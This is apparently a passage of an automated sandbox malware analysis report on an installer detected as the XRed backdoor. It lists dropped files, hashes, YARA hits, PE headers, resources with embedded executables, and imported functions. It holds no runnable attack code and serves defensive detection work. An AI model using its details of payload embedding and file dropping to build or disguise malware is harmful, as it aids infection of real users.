                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                            MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                            SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                            SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                            SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):3.746897789531007
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                            MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                            SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                            SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                            SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                            Malicious:false
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\Dzsb.Qyd.Install.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):170048
                                                                                                            Entropy (8bit):5.240723641804677
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:5GHDYWAQHwKMow61yOVMBEx/WiUY8eYTuuX6kbaQvNU2G/lQRp04s:5yDYzQQKMo9cOmOx/AYCjG/lQRp07
                                                                                                            MD5:2CE4CD44B3F4B4527FF1BA1D40B3C6BC
                                                                                                            SHA1:CBECE515867DC8CCFA393811C9E71F6CCAE9B239
                                                                                                            SHA-256:D74A7E37DD6757CBA14FDA64511F2D0F6E89D85E2F3A2413CDA048207D9F2BF3
                                                                                                            SHA-512:95A2883EAA781F1C955D568021DC4D1C2B5723DA77E4A895BA19575BDDE38E146453C83AB51F6E1C07AD3EA1E0B71FC64D5586193C62146449AB0102CD5CAC9D
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`...T..T..T.QT...T..T..T.ST..TV.ST..T..T...T.nT..T9.PT..T.TT..TRich..T........................PE..L......R.................0...P......8.............@.................................x...........................................P.......................@............@..............................................<................................textbss.................................text..../.......0.................. ..`.rdata.. ....@...0...@..............@..@.data....1...p... ...p..............@....idata..............................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                            Category:dropped
                                                                                                            Size (bytes):18387
                                                                                                            Entropy (8bit):7.523057953697544
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                            Malicious:false
                                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):165
                                                                                                            Entropy (8bit):1.3520167401771568
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:8Nultln:X1n
                                                                                                            MD5:9AC4D67F6E514F452D4A1DB79CE3B2E8
                                                                                                            SHA1:33F8C665ECBB81275D2E49D48F2565A58A282043
                                                                                                            SHA-256:407E1D871964C93DBDBD4D00613CD0A9E30D3ED6352D8052C58E7A252D52FC5A
                                                                                                            SHA-512:018D0F54AB0AB01F27E9FB870A128F2F581A58487399DD7FB56A94EC4AAEC6874708A5AD5650F362485E45E2C6A557ED08524C5B8335F83F240E0962281A0F1A
                                                                                                            Malicious:false
                                                                                                            Preview:.user ..c.a.l.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):771584
                                                                                                            Entropy (8bit):6.632404275608864
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I3r:ansJ39LyjbJkQFMhmC+6GD9c
                                                                                                            MD5:921D4ED8B1BD7EFFC64D14DF5204C817
                                                                                                            SHA1:74686449F24F0CD745C4BDE0A7E6F41ABF17DAAD
                                                                                                            SHA-256:479FFD1BD8ADB0CBABA12207B91F58BAE92FE5F49FF2A8D4354853463638514E
                                                                                                            SHA-512:3C6CCCD09E06E11D4EDA44172C908DD0AD61D89B5957F9EB5575F6A6A43026FAAF13486ACA409399C4FE344CEC1ADF3BE0257926A863B9978C44469E16440A7F
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                            Category:dropped
                                                                                                            Size (bytes):18387
                                                                                                            Entropy (8bit):7.523057953697544
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                            MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                            SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                            SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                            SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                            Malicious:false
                                                                                                            Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):165
                                                                                                            Entropy (8bit):1.3520167401771568
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:8Nultln:X1n
                                                                                                            MD5:9AC4D67F6E514F452D4A1DB79CE3B2E8
                                                                                                            SHA1:33F8C665ECBB81275D2E49D48F2565A58A282043
                                                                                                            SHA-256:407E1D871964C93DBDBD4D00613CD0A9E30D3ED6352D8052C58E7A252D52FC5A
                                                                                                            SHA-512:018D0F54AB0AB01F27E9FB870A128F2F581A58487399DD7FB56A94EC4AAEC6874708A5AD5650F362485E45E2C6A557ED08524C5B8335F83F240E0962281A0F1A
                                                                                                            Malicious:false
                                                                                                            Preview:.user ..c.a.l.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):771584
                                                                                                            Entropy (8bit):6.632404275608864
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I3r:ansJ39LyjbJkQFMhmC+6GD9c
                                                                                                            MD5:921D4ED8B1BD7EFFC64D14DF5204C817
                                                                                                            SHA1:74686449F24F0CD745C4BDE0A7E6F41ABF17DAAD
                                                                                                            SHA-256:479FFD1BD8ADB0CBABA12207B91F58BAE92FE5F49FF2A8D4354853463638514E
                                                                                                            SHA-512:3C6CCCD09E06E11D4EDA44172C908DD0AD61D89B5957F9EB5575F6A6A43026FAAF13486ACA409399C4FE344CEC1ADF3BE0257926A863B9978C44469E16440A7F
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1835008
                                                                                                            Entropy (8bit):4.31018078132833
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:Nzw8CE/ZeaJFSSPkY6B0CvpuIUOa4+e9gFbJUjWKdHjj5+aJ1aCREf4GEA:N08bWvp63qtdHHQCeAJ
                                                                                                            MD5:E8AD7BDD75098D03C1D5BF5BB8A45474
                                                                                                            SHA1:2382CB1AE19F1BE850240A143DA43D3182BEEB74
                                                                                                            SHA-256:6C4C0669AFC76E59F7932D7BB6EB77736FBBDDB8BCF3F1BE794C63C9F5B26909
                                                                                                            SHA-512:57C1FB528EA0BC089B4E76BD5A66025347D10F4B49BD265B61F7622F985AE228E9CCF56117F183400D112126C4C13EA7E8B637AB59B039DB65716FCEDC306FAB
                                                                                                            Malicious:false
                                                                                                            Preview:regfG...G....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7tH7................................................................................................................................................................................................................................................................................................................................................#@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):6.484741061010045
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 93.21%
                                                                                                            • Win32 Executable Borland Delphi 7 (665061/41) 6.20%
                                                                                                            • InstallShield setup (43055/19) 0.40%
                                                                                                            • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                            File name:Dzsb.Qyd.Install.exe
                                                                                                            File size:941'568 bytes
                                                                                                            MD5:8f6f7010f18c00958433f02d47130dd1
                                                                                                            SHA1:96420693a48930b1420dca7c5d02792ea7009693
                                                                                                            SHA256:f20191f25cc57ee5c30328a5bd3821788d8db2ed60901f728122d596185fc651
                                                                                                            SHA512:41e6f0b9458ec1cc304b606602bbe8289522e0ac4183c64c3ae434d54792707eb061e9f3746339b745cf6ba7b511a9d6db7dbae94acaff75255fae3ebe0521fb
                                                                                                            SSDEEP:12288:kMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9yjQ2WH95Cjs7:knsJ39LyjbJkQFMhmC+6GD9uQ2e9Qo
                                                                                                            TLSH:C1156D22B2918437D2621B388C5BE2E458297E612F6475CFB7F43D6C5E392C329361DB
                                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                            Icon Hash:8a80809292808001
                                                                                                            Entrypoint:0x49ab80
                                                                                                            Entrypoint Section:CODE
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                            DLL Characteristics:
                                                                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                            Instruction
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            add esp, FFFFFFF0h
                                                                                                            mov eax, 0049A778h
                                                                                                            call 00007F6694873D4Dh
                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                            mov eax, dword ptr [eax]
                                                                                                            call 00007F66948C7695h
                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                            mov eax, dword ptr [eax]
                                                                                                            mov edx, 0049ABE0h
                                                                                                            call 00007F66948C7294h
                                                                                                            mov ecx, dword ptr [0049DBDCh]
                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                            mov eax, dword ptr [eax]
                                                                                                            mov edx, dword ptr [00496590h]
                                                                                                            call 00007F66948C7684h
                                                                                                            mov eax, dword ptr [0049DBCCh]
                                                                                                            mov eax, dword ptr [eax]
                                                                                                            call 00007F66948C76F8h
                                                                                                            call 00007F669487182Bh
                                                                                                            add byte ptr [eax], al
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x3b570.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .idata0xa00000x2a420x2c0021ff53180b390dc06e3a1adf0e57a073False0.3537819602272727data4.919333216027082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .tls0xa30000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rdata0xa40000x390x200a92cf494c617731a527994013429ad97False0.119140625MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"0.7846201577093705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xa50000xa9800xaa00dcd1b1c3f3d28d444920211170d1e8e6False0.5899816176470588data6.674124985579511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xb00000x3b5700x3b600d677c52d7abf342f628dc6cbb9357c6aFalse0.3280345394736842data5.507491842385108IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_CURSOR0xb0dc80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                            RT_CURSOR0xb0efc0x134data0.4642857142857143
                                                                                                            RT_CURSOR0xb10300x134data0.4805194805194805
                                                                                                            RT_CURSOR0xb11640x134data0.38311688311688313
                                                                                                            RT_CURSOR0xb12980x134data0.36038961038961037
                                                                                                            RT_CURSOR0xb13cc0x134data0.4090909090909091
                                                                                                            RT_CURSOR0xb15000x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                            RT_BITMAP0xb16340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                            RT_BITMAP0xb18040x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                            RT_BITMAP0xb19e80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                            RT_BITMAP0xb1bb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                            RT_BITMAP0xb1d880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                            RT_BITMAP0xb1f580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                            RT_BITMAP0xb21280x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                            RT_BITMAP0xb22f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                            RT_BITMAP0xb24c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                            RT_BITMAP0xb26980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                            RT_BITMAP0xb28680xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                            RT_ICON0xb29500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.2324108818011257
                                                                                                            RT_ICON0xb39f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 8192TurkishTurkey0.2101313320825516
                                                                                                            RT_DIALOG0xb4aa00x52data0.7682926829268293
                                                                                                            RT_STRING0xb4af40x358data0.3796728971962617
                                                                                                            RT_STRING0xb4e4c0x428data0.37406015037593987
                                                                                                            RT_STRING0xb52740x3a4data0.40879828326180256
                                                                                                            RT_STRING0xb56180x3bcdata0.33472803347280333
                                                                                                            RT_STRING0xb59d40x2d4data0.4654696132596685
                                                                                                            RT_STRING0xb5ca80x334data0.42804878048780487
                                                                                                            RT_STRING0xb5fdc0x42cdata0.42602996254681647
                                                                                                            RT_STRING0xb64080x1f0data0.4213709677419355
                                                                                                            RT_STRING0xb65f80x1c0data0.44419642857142855
                                                                                                            RT_STRING0xb67b80xdcdata0.6
                                                                                                            RT_STRING0xb68940x320data0.45125
                                                                                                            RT_STRING0xb6bb40xd8data0.5879629629629629
                                                                                                            RT_STRING0xb6c8c0x118data0.5678571428571428
                                                                                                            RT_STRING0xb6da40x268data0.4707792207792208
                                                                                                            RT_STRING0xb700c0x3f8data0.37598425196850394
                                                                                                            RT_STRING0xb74040x378data0.41103603603603606
                                                                                                            RT_STRING0xb777c0x380data0.35379464285714285
                                                                                                            RT_STRING0xb7afc0x374data0.4061085972850679
                                                                                                            RT_STRING0xb7e700xe0data0.5535714285714286
                                                                                                            RT_STRING0xb7f500xbcdata0.526595744680851
                                                                                                            RT_STRING0xb800c0x368data0.40940366972477066
                                                                                                            RT_STRING0xb83740x3fcdata0.34901960784313724
                                                                                                            RT_STRING0xb87700x2fcdata0.36649214659685864
                                                                                                            RT_STRING0xb8a6c0x354data0.31572769953051644
                                                                                                            RT_RCDATA0xb8dc00x44data0.8676470588235294
                                                                                                            RT_RCDATA0xb8e040x10data1.5
                                                                                                            RT_RCDATA0xb8e140x29840PE32 executable (GUI) Intel 80386, for MS Windows0.25760961610839295
                                                                                                            RT_RCDATA0xe26540x3ASCII text, with no line terminatorsTurkishTurkey3.6666666666666665
                                                                                                            RT_RCDATA0xe26580x3c00PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsTurkishTurkey0.54296875
                                                                                                            RT_RCDATA0xe62580x64cdata0.5998759305210918
                                                                                                            RT_RCDATA0xe68a40x153Delphi compiled form 'TFormVir'0.7522123893805309
                                                                                                            RT_RCDATA0xe69f80x47d3Microsoft Excel 2007+TurkishTurkey0.8675150921846957
                                                                                                            RT_GROUP_CURSOR0xeb1cc0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                            RT_GROUP_CURSOR0xeb1e00x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                            RT_GROUP_CURSOR0xeb1f40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                            RT_GROUP_CURSOR0xeb2080x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                            RT_GROUP_CURSOR0xeb21c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                            RT_GROUP_CURSOR0xeb2300x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                            RT_GROUP_CURSOR0xeb2440x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                            RT_GROUP_ICON0xeb2580x14dataTurkishTurkey1.1
                                                                                                            RT_VERSION0xeb26c0x304dataTurkishTurkey0.42875647668393785
                                                                                                            DLLImport
                                                                                                            kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                            user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                            advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                                            kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
